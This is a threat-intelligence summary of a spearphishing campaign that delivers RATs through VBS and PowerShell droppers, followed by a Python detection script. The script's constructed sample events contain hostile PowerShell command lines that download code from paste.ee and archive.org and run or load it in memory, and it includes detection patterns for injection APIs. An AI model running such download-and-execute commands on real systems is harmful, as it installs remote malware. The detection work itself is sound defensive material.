
Unmasking the Infrastructure of a Spearphishing Campaign

ID: 3a334981-f6f3-5453-ab1b-2db53952c55f

STIX ID: report--3a334981-f6f3-5453-ab1b-2db53952c55f

Feed Name: Censys Blog

Threat Score
75/100

Date Published: 2025-06-10

Date Updated: 2026-04-27

Author: Ivonne Francia; Mark Ellzey; Senior Security Researcher

...
...

A cluster of 16 open directories hosting heavily obfuscated Visual Basic Script droppers (notably files named "sostener.vbs") was analyzed. The droppers implement a three-stage installer, VBS -> dynamically generated PowerShell stager -> memory injector, ending in in-memory execution of a RAT. Observed payloads include Remcos (multiple strains), LimeRAT, DCRat, and AsyncRAT. The C2 infrastructure uses duckdns.org dynamic DNS domains, with related hosts identified through TLS certificate pivoting, and payloads are hosted on paste.ee, Bitbucket, and archive.org. The report lists extensive IOCs and suggests a possible but unconfirmed link to APT-C-36.
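As an added example (not part of the Censys report or its IOC list), the following Python flags the VBS -> PowerShell stager -> in-memory loader sequence in process-creation telemetry. The event field names (Sysmon Event ID 1 style), the detection heuristics and the sample events are assumptions constructed for illustration; only the hosting services and the "sostener.vbs" file name come from the summary above.

```python
"""Added example: flag the VBS -> PowerShell stager -> in-memory loader chain in
process-creation telemetry. Events below are constructed, not from the report;
the Sysmon Event ID 1 field mapping (ProcessId, ParentProcessId, Image,
CommandLine) is an assumption."""
import base64
import json
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Payload/C2 hosting named in the summary; subdomains match too (e.g. *.duckdns.org).
SUSPECT_HOSTS = ("paste.ee", "bitbucket.org", "archive.org", "duckdns.org")

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_RE = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc(?:ommand)?)\s+([A-Za-z0-9+/=]+)",
    re.I,
)
IEX_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
MEMLOAD_RE = re.compile(
    r"Reflection\.Assembly\]::Load|VirtualAlloc|WriteProcessMemory|CreateRemoteThread", re.I
)

# Constructed stager: what a -EncodedCommand would carry (UTF-16LE, base64).
_STAGER = "IEX ((New-Object Net.WebClient).DownloadString('https://paste.ee/r/exampleid'))"
ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode()

# Constructed sample telemetry, one JSON object per line. __ENC__ is filled in below.
SAMPLE_EVENTS = r'''
{"ProcessId": 4100, "ParentProcessId": 700, "Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"}
{"ProcessId": 4212, "ParentProcessId": 4100, "Image": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "wscript.exe C:\\Users\\u\\Downloads\\sostener.vbs"}
{"ProcessId": 4300, "ParentProcessId": 4212, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -nop -ep bypass -enc __ENC__"}
{"ProcessId": 4320, "ParentProcessId": 4300, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -c \"$u='https://archive.org/download/x/y.bin';$b=(New-Object Net.WebClient).DownloadData($u);[Reflection.Assembly]::Load($b)\""}
{"ProcessId": 5000, "ParentProcessId": 4100, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"}
'''.replace("__ENC__", ENCODED)


def load_events(jsonl):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def image_name(event):
    """Lower-cased executable name from a Windows image path."""
    return event["Image"].rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def suspicious_hosts(text):
    """Hostnames in URLs that match the hosting services listed in the summary."""
    found = set()
    for host in URL_RE.findall(text):
        host = host.lower()
        if any(host == s or host.endswith("." + s) for s in SUSPECT_HOSTS):
            found.add(host)
    return sorted(found)


def script_host_ancestor(event, by_pid, max_depth=3):
    """Walk up the parent chain for wscript/cscript. The injector stage may be a
    second powershell.exe spawned by the stager, so allow a few hops."""
    anc = by_pid.get(event["ParentProcessId"])
    depth = 0
    while anc is not None and depth < max_depth:
        if image_name(anc) in SCRIPT_HOSTS:
            return anc
        anc = by_pid.get(anc["ParentProcessId"])
        depth += 1
    return None


def find_stager_chains(events):
    """Return one hit per PowerShell process descended from a script host,
    with the indicators seen in its (decoded) command line."""
    by_pid = {e["ProcessId"]: e for e in events}
    hits = []
    for e in events:
        if image_name(e) not in POWERSHELL:
            continue
        host = script_host_ancestor(e, by_pid)
        if host is None:
            continue  # e.g. PowerShell launched directly by the user
        decoded = decode_encoded_command(e["CommandLine"])
        effective = decoded if decoded is not None else e["CommandLine"]
        indicators = []
        if decoded is not None:
            indicators.append("encoded-command")
        if HIDDEN_RE.search(e["CommandLine"]):
            indicators.append("hidden-window")
        if IEX_RE.search(effective):
            indicators.append("iex")
        if MEMLOAD_RE.search(effective):
            indicators.append("in-memory-load")
        hosts = suspicious_hosts(effective)
        if hosts:
            indicators.append("hosting:" + ",".join(hosts))
        hits.append({"pid": e["ProcessId"], "script_host_pid": host["ProcessId"],
                     "script": host["CommandLine"], "indicators": indicators})
    return hits


if __name__ == "__main__":
    for hit in find_stager_chains(load_events(SAMPLE_EVENTS)):
        print(json.dumps(hit))
```

The ancestor walk matters more than any single string match: the stager decodes and runs a second PowerShell that does the reflective load, so a rule keyed only on "wscript.exe spawned powershell.exe" misses the injector stage, while the benign `backup.ps1` launched from explorer.exe is ignored because no script host sits above it.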
